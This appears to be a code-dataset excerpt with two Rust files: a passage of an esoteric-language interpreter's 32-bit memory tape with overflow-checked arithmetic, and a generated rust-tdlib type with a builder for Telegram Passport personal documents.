    memory: Vec<u32>,
    // Index of the currently addressed cell.
    pointer: u32,
    // Runtime options (tape size, overflow policy).
    args: &'a Args
}
impl Memory32<'_> {
    /// Builds a tape of `args.memory_size` zeroed cells with the data
    /// pointer at cell 0. The returned value borrows `args`.
    pub fn new(args: &Args) -> Memory32<'_> {
        let cell_count = u32::from(args.memory_size) as usize;
        Memory32 {
            memory: vec![0; cell_count],
            pointer: 0,
            args,
        }
    }
}
impl Memory<u32> for Memory32<'_> {
fn args(&self) -> &Args {
self.args
}
fn size(&self) -> u32 {
self.args.memory_size.into()
}
fn null() -> u32 {
0
}
// pointer
fn pointer(&self) -> u32 {
self.pointer
}
fn pointer_mut(&mut self) -> &mut u32 {
&mut self.pointer
}
// memory
fn value(&self, pointer: u32) -> u32 {
self.memory[pointer as usize]
}
fn value_mut(&mut self, pointer: u32) -> &mut u32 {
&mut self.memory[pointer as usize]
}
fn value_is_null(&self, value: u32) -> bool {
value == 0
}
fn add_value(&self, pointer: u32, n: u32) -> Result<u32, Error> {
if self.args.no_overflows {
match self.value(pointer).checked_add(n) {
None => Err(Error::PositiveOverflow(pointer)),
Some(ok) => Ok(ok)
}
} else {
Ok(self.value(pointer).wrapping_add(n))
}
}
fn sub_value(&self, pointer: u32, n: u32) -> Result<u32, Error> {
if self.args.no_overflows {
match self.value(pointer).checked_sub(n) {
None => Err(Error::NegativeOverflow(pointer)),
Some(ok) => Ok(ok)
}
} else {
Ok(self.value(pointer).wrapping_sub(n))
}
}
// conversions
fn value_to_u32(value: u32) -> u32 {
value
}
fn value_to_string(value: u32) -> String {
value.to_string()
}
fn value_to_char(value: u32) -> Result<char, Error> {
match char::from_u32(value) {
None => Err(Error::InvalidUnicode(value)),
Some(char) => Ok(char)
}
}
fn char_to_value(char: char) -> Result<u32, Error> {
Ok(char as u32)
}
}
| true |
e6fbf3e270217994db6821a1356fd7d053786a34
|
Rust
|
himlpplm/rust-tdlib
|
/src/types/input_personal_document.rs
|
UTF-8
| 2,161 | 2.734375 | 3 |
[
"MIT"
] |
permissive
|
use crate::errors::*;
use crate::types::*;
use uuid::Uuid;
/// A personal document to be saved to Telegram Passport
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
pub struct InputPersonalDocument {
    #[doc(hidden)]
    #[serde(rename(serialize = "@extra", deserialize = "@extra"))]
    // Set to a fresh UUID string by `builder()`; serialised as "@extra".
    extra: Option<String>,
    #[serde(rename(serialize = "@client_id", deserialize = "@client_id"))]
    // Serialised as "@client_id"; presumably identifies the originating
    // client instance — TODO confirm against the RObject consumers.
    client_id: Option<i32>,
    /// List of files containing the pages of the document
    files: Vec<InputFile>,
    /// List of files containing a certified English translation of the document
    translation: Vec<InputFile>,
}
// Exposes the bookkeeping fields (`@extra`, `@client_id`) through the
// common `RObject` trait.
impl RObject for InputPersonalDocument {
    #[doc(hidden)]
    fn extra(&self) -> Option<&str> {
        self.extra.as_deref()
    }
    #[doc(hidden)]
    fn client_id(&self) -> Option<i32> {
        self.client_id
    }
}
impl InputPersonalDocument {
pub fn from_json<S: AsRef<str>>(json: S) -> RTDResult<Self> {
Ok(serde_json::from_str(json.as_ref())?)
}
pub fn builder() -> RTDInputPersonalDocumentBuilder {
let mut inner = InputPersonalDocument::default();
inner.extra = Some(Uuid::new_v4().to_string());
RTDInputPersonalDocumentBuilder { inner }
}
pub fn files(&self) -> &Vec<InputFile> {
&self.files
}
pub fn translation(&self) -> &Vec<InputFile> {
&self.translation
}
}
#[doc(hidden)]
pub struct RTDInputPersonalDocumentBuilder {
    // Work-in-progress value; cloned out by `build()`.
    inner: InputPersonalDocument,
}
impl RTDInputPersonalDocumentBuilder {
    /// Returns a clone of the accumulated document; the builder stays usable.
    pub fn build(&self) -> InputPersonalDocument {
        self.inner.clone()
    }

    /// Sets the files containing the pages of the document.
    pub fn files(&mut self, files: Vec<InputFile>) -> &mut Self {
        self.inner.files = files;
        self
    }

    /// Sets the files containing the certified English translation.
    pub fn translation(&mut self, translation: Vec<InputFile>) -> &mut Self {
        self.inner.translation = translation;
        self
    }
}
// Lets a fully-built document be passed wherever `AsRef<InputPersonalDocument>`
// is accepted.
impl AsRef<InputPersonalDocument> for InputPersonalDocument {
    fn as_ref(&self) -> &InputPersonalDocument {
        self
    }
}

// Lets the builder itself be passed without calling `build()` (borrows the
// in-progress value).
impl AsRef<InputPersonalDocument> for RTDInputPersonalDocumentBuilder {
    fn as_ref(&self) -> &InputPersonalDocument {
        &self.inner
    }
}
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.